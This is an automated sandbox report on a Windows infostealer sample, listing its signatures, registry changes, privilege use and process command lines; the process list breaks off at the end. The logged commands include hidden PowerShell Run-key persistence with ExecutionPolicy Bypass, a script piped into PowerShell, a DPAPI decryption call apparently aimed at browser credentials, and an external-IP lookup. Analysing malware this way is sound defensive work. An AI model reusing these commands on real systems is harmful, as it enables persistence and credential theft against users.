Malware Analysis Report

2024-11-13 14:28

Sample ID: 240603-lsnq6sbg54
Target: xylex.exe
SHA256: 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
Tags: execution persistence spyware stealer
Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256: 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e

Threat Level: Likely malicious

The file xylex.exe was found to be: Likely malicious.

Malicious Activity Summary

execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Detects videocard installed

Enumerates processes with tasklist

Enumerates system info in registry

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 09:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 09:47

Reported

2024-06-03 09:57

Platform

win7-20240508-en

Max time kernel

120s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 09:47

Reported

2024-06-03 09:57

Platform

win10v2004-20240426-en

Max time kernel

300s

Max time network

304s

Command Line

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cscript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\gVudEeAjIOYTLzJ.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xylex.exe" C:\Windows\system32\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133618820258415901" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3396 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4444 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4444 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4876 wrote to memory of 2836 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4876 wrote to memory of 2836 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3396 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1536 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1536 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 856 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 856 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3396 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\curl.exe
PID 3396 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\curl.exe
PID 3396 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1208 wrote to memory of 4404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1208 wrote to memory of 4404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 508 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 508 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3396 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 2216 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2216 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1712 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5040 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5040 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3396 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 2740 wrote to memory of 716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2740 wrote to memory of 716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 404 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3396 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1884 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1884 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3396 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 4720 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4720 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 3636 wrote to memory of 4916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3636 wrote to memory of 4916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3396 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3324 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WaaSMedicAgent.exe
PID 3324 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WaaSMedicAgent.exe
PID 3324 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3324 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p22tuu2q\p22tuu2q.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85E9.tmp" "c:\Users\Admin\AppData\Local\Temp\p22tuu2q\CSCA1265762AF2049E0913954F9F1C15260.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

